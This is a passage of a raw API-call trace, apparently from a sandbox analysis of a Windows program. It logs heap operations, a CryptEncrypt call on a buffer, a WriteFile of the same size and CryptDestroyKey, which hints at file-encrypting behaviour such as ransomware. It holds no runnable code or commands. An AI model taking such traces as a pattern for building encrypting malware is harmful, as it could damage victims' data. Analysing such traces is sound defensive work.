Size=0x10) returned 0x2e50ab8 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0214.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0214.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b18 [0214.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.833] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0214.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54350 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0214.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0214.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0214.834] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xb494, dwBufLen=0xb498 | out: pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xb498) returned 1 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0214.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0214.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0214.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0214.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0214.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0214.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0214.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0214.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0214.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0214.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0214.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0214.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0214.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0214.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0214.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.840] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0214.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0214.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0214.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.840] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0214.840] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.841] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.841] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.841] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0214.841] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.841] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.841] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.910] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0xb498, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0xb498, lpOverlapped=0x0) returned 1 [0214.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.915] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0214.915] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.915] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0214.915] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50860, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0214.916] CryptDestroyKey (hKey=0xa87110) returned 1 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0214.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0214.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0214.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0214.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0214.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0214.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0214.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0214.918] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.918] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0214.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0214.918] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0214.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0214.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0214.919] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0214.919] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0214.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0214.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0214.919] 